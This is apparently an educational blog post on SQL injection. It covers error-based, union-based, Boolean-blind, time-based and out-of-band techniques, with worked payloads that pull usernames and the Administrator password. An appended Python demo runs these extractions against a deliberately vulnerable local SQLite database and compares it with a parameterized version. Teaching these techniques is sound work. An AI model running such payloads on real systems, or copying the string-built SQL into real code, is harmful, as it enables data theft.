Hello, today I want to talk about the SQL Injection vulnerability from the OWASP Top 10, which every ethical hacker and bug bounty hunter should know for web application hacking.
SQL injection is a web application database attack in which the attacker inserts SQL commands into input that the application concatenates into a query.
When the injected SQL is executed, it affects the data in the database as follows:
- Attackers can read sensitive information such as usernames, passwords, and credit card information from the database.
- Attackers can modify data in the database, such as adding, deleting, or editing data.
- Depending on the database account's privileges and the database's features (such as writing files or running commands), attackers can reach remote code execution on the database server's operating system.

In-Band SQLi (Classic)
In-band SQL injection is a type of SQL injection attack where the attacker uses the same communication channel to both launch the attack and receive the results of the attack. The results of the attack are typically displayed directly on the web application page.
Two common subtypes of in-band SQL injection are:
Error-based SQLi
In error-based SQLi, the attacker crafts a deliberately malformed SQL query. If the application echoes the database's error message, that message reveals information about the structure of the database (the DBMS in use, table and column names, or even selected values). The attacker can then use this information to construct a new, valid SQL query and extract data. This only works while the application shows verbose database errors; once errors are handled generically, the same injection point must be exploited with the union-based or blind techniques below.
Example:
Input: www.example.com/app.php?id='
Output: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for details.

Union-based SQLi
In union-based SQLi, the attacker extracts data from the database by using the UNION SQL operator, which appends the result of a second SELECT to the result of the application's own query, so the stolen rows are rendered wherever the application shows its normal results.
The first SQL query is the application's original query, which must stay syntactically valid. The second SQL query is supplied by the attacker and reads from another table; for the UNION to succeed it must return the same number of columns as the first query, with compatible data types, so the attacker usually determines the column count first (for example with ORDER BY n or UNION SELECT NULL,NULL,...).
Example:
Input: www.example.com/app.php?id=' union select username, password from users--
Output: john:password123 mary:password456

Blind SQL Injection
In Blind SQL Injection, attackers cannot directly read the results of the SQL query, but they can infer information from the response of the web application. There are two main types of Blind SQLi:
1. Boolean-based SQL Injection
In Boolean-based SQL Injection, attackers craft SQL conditions that evaluate to true or false and make the page differ accordingly (for example, content shown versus not shown). Each request therefore leaks one bit, and the attacker uses this to extract data from the database, one character at a time.
Example:
Target: www.example.com/app.php?id=1
Backend Query: SELECT title FROM product WHERE id = 1

Payload #1 (False): www.example.com/app.php?id=1 AND 1=2
Backend Query: SELECT title FROM product WHERE id = 1 AND 1=2
Result: Nothing is returned on the page.
Inference: The condition 1=2 is always false, so the query returns no rows. The page changed even though product ID 1 exists, which shows that the injected condition was evaluated by the database.

Payload #2 (True): www.example.com/app.php?id=1 AND 1=1
Backend Query: SELECT title FROM product WHERE id = 1 AND 1=1
Result: The title of product ID 1 is returned on the page.
Inference: The condition 1=1 is always true, so the query behaves like the original. Together with Payload #1, this confirms that the attacker's input is interpreted as SQL and that a true/false condition can be read off the page.

Attack: The attacker can use this technique to extract the password of the user "Administrator", one character at a time.
Payload: www.example.com/app.php?id=1 AND SUBSTRING((SELECT password FROM users WHERE username = 'Administrator'), 1, 1) = 's'
Backend Query: SELECT title FROM product WHERE id = 1 AND SUBSTRING((SELECT password FROM users WHERE username = 'Administrator'), 1, 1) = 's'
Result: Nothing is returned on the page.
Inference: "s" is not the first character of the stored (hashed) password.
Payload: www.example.com/app.php?id=1 AND SUBSTRING((SELECT password FROM users WHERE username = 'Administrator'), 1, 1) = 'e'
Backend Query: SELECT title FROM product WHERE id = 1 AND SUBSTRING((SELECT password FROM users WHERE username = 'Administrator'), 1, 1) = 'e'
Result: The title of product ID 1 is returned on the page.
Inference: "e" is the first character of the stored password. Repeating this for positions 2, 3, ... recovers the whole value; in practice the candidate set is narrowed with comparisons such as > 'm' (a binary search over the character range) instead of testing every character one by one.

2. Time-based SQL Injection
In Time-based SQL Injection, the page looks the same whether the injected condition is true or false, so attackers craft SQL queries that make the database pause (for example with MySQL's sleep()) only when a condition holds. The response time then leaks one bit per request, and data is extracted from the database the same way as in the Boolean-based case.
Example:
Input: www.example.com/users.php?username=' AND sleep(5)--
Backend Query: SELECT * FROM users WHERE username = '' AND sleep(5)--'
Explanation:
The sleep(5) function causes the database to wait for 5 seconds before returning the results of the query. If the response is delayed by about 5 seconds, the injection point is confirmed even though nothing changes on the page. Note that sleep() is only reached for rows where the left side of the AND is true, so a database that short-circuits the condition may not delay at all for username = ''; starting from a valid username (see the section on valid values below) avoids this.
To extract data, the delay is made conditional on the character being guessed. Using the same subquery as in the Boolean-based example, the following payload makes the database wait 5 seconds only if the first character of the administrator's hashed password is an 'a':
www.example.com/users.php?username=' AND IF(SUBSTRING((SELECT password FROM users WHERE username = 'Administrator'), 1, 1) = 'a', sleep(5), 0)--
If the first character is not an 'a', the same request returns without the delay, and the attacker moves on to the next candidate character. Because network jitter can imitate a short delay, measure a baseline response time first and repeat borderline results before trusting them.

Out-of-Band SQLi (OAST)
Out-of-band SQLi is used when the attacker can observe neither the query results nor a difference in the page content or its timing:
- The attacker uses a communication channel outside of the normal web application channel, typically DNS or HTTP.
- The attacker constructs an SQL query that makes the database server itself contact an external system the attacker controls, with the data to exfiltrate embedded in the request (for example as a subdomain in a DNS lookup).
- The attacker's external system receives the request and logs it.
- The attacker analyzes the logged requests to extract information from the database.
This depends on the database offering a feature that performs network requests and on the database host being allowed to reach the attacker's system, so it is not available on every target.

Using valid values
In web applications, a "valid" value is one that the application accepts as input and that produces a positive, repeatable result.
Example:
/products?id=1 displays the product with ID 1 (valid)
/products?id=0 displays a 404 page because there is no product with ID 0 (invalid)

Using "valid" values initially is important because:
- It makes it easier to find SQL injections: the baseline request succeeds, so any change in the response can be attributed to the injected characters.
- It keeps the application behaving stably, so responses are repeatable and can be compared with each other.

Starting from a valid value, the three probes below tell a vulnerable app apart from a secure one. The trailing ' -- - turns the rest of the query into a comment, which repairs the syntax only if the quote really broke out of the string; a secure app treats the whole input as literal text and simply finds no match.
-- Starting from a valid value
+--------------------------+--------------------------+---------------------+
|Input                     | Result in Vulnerable App | Result in Secure App|
+--------------------------+--------------------------+---------------------+
|valid search term         | 200 OK                   | 200 OK              |
+--------------------------+--------------------------+---------------------+
|valid search term'        | 404 Not Found            | 404 Not Found       |
+--------------------------+--------------------------+---------------------+
|valid search term' -- -   | 200 OK                   | 404 Not Found       |
+--------------------------+--------------------------+---------------------+
Starting from an invalid value, every probe returns the same result in both apps, so nothing can be learned from the responses:
-- Starting from an invalid value
+--------------------------+--------------------------+---------------------+
|Input                     | Result in Vulnerable App | Result in Secure App|
+--------------------------+--------------------------+---------------------+
|invalid search term       | 404 Not Found            | 404 Not Found       |
+--------------------------+--------------------------+---------------------+
|invalid search term'      | 404 Not Found            | 404 Not Found       |
+--------------------------+--------------------------+---------------------+
|invalid search term' -- - | 404 Not Found            | 404 Not Found       |
+--------------------------+--------------------------+---------------------+
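The probing tables above, the union-based example and the Boolean-based blind extraction walkthrough, as one added Python example that is not part of the original post. It stands in for www.example.com with an in-memory SQLite database: the product and users tables, the sample rows (including the Administrator "password" value, which is an assumed hash-like string, not a real hash) and the mapping of query results to 200/404 are all constructed for the example. The vulnerable functions build SQL by string formatting exactly as the page describes; the secure search binds the term as a parameter. SQLite spells MySQL's SUBSTRING as SUBSTR and understands the same -- comment, so the page's payloads carry over unchanged.

```python
import sqlite3
import string


def make_db():
    """Build the constructed sample database (stand-in for www.example.com's backend)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO product VALUES (?, ?)", [(1, "Laptop"), (2, "Phone")])
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Constructed rows; the Administrator value is an assumed hash-like string, not a real hash.
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("Administrator", "e3b0c442"), ("john", "password123")])
    conn.commit()
    return conn


def vulnerable_search(conn, term):
    """Vulnerable: the search term is spliced into the SQL text; a DB error becomes a 404."""
    sql = "SELECT title FROM product WHERE title = '%s'" % term
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return 404
    return 200 if rows else 404


def secure_search(conn, term):
    """Secure: the term is bound as a parameter, so quotes and comments never reach the parser."""
    rows = conn.execute("SELECT title FROM product WHERE title = ?", (term,)).fetchall()
    return 200 if rows else 404


def probe(search, conn, term):
    """The three probes from the tables: term, term', term' -- -  (returns the three status codes)."""
    return [search(conn, term), search(conn, term + "'"), search(conn, term + "' -- -")]


def vulnerable_product_titles(conn, id_param):
    """Vulnerable id endpoint (SELECT title FROM product WHERE id = <input>); None on a DB error."""
    sql = "SELECT title FROM product WHERE id = %s" % id_param
    try:
        return [row[0] for row in conn.execute(sql).fetchall()]
    except sqlite3.Error:
        return None


def union_extract(conn):
    """Union-based: the injected SELECT must return the same single column as the original query."""
    payload = "0 UNION SELECT username || ':' || password FROM users"
    return vulnerable_product_titles(conn, payload) or []


def blind_extract(conn, max_len=64):
    """Boolean-based blind: recover Administrator's password one character at a time.

    Each request asks whether character `pos` equals `ch`; product 1 is shown only when true.
    """
    alphabet = string.ascii_lowercase + string.digits
    secret = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            payload = ("1 AND SUBSTR((SELECT password FROM users WHERE username = 'Administrator'),"
                       " %d, 1) = '%s'" % (pos, ch))
            if vulnerable_product_titles(conn, payload):
                secret += ch
                break
        else:
            break  # no candidate matched: we ran past the end of the value
    return secret


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, valid term :", probe(vulnerable_search, db, "Laptop"))   # [200, 404, 200]
    print("secure, valid term     :", probe(secure_search, db, "Laptop"))       # [200, 404, 404]
    print("vulnerable, invalid    :", probe(vulnerable_search, db, "Nothing"))  # [404, 404, 404]
    print("union extraction       :", union_extract(db))
    print("blind extraction       :", blind_extract(db))
```

Run it as a script and compare the first three lines with the tables: only the combination of a valid term and the ' -- - probe separates the vulnerable app from the secure one, and an invalid starting term gives 404 everywhere. The blind loop tests every candidate character at each position, which is the page's method; a real tool would halve the search with > comparisons as noted above.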
Remember! Hacking is illegal; you cannot hack people or companies without permission. This blog post is made for educational purposes only, so you can learn and practice in your own lab.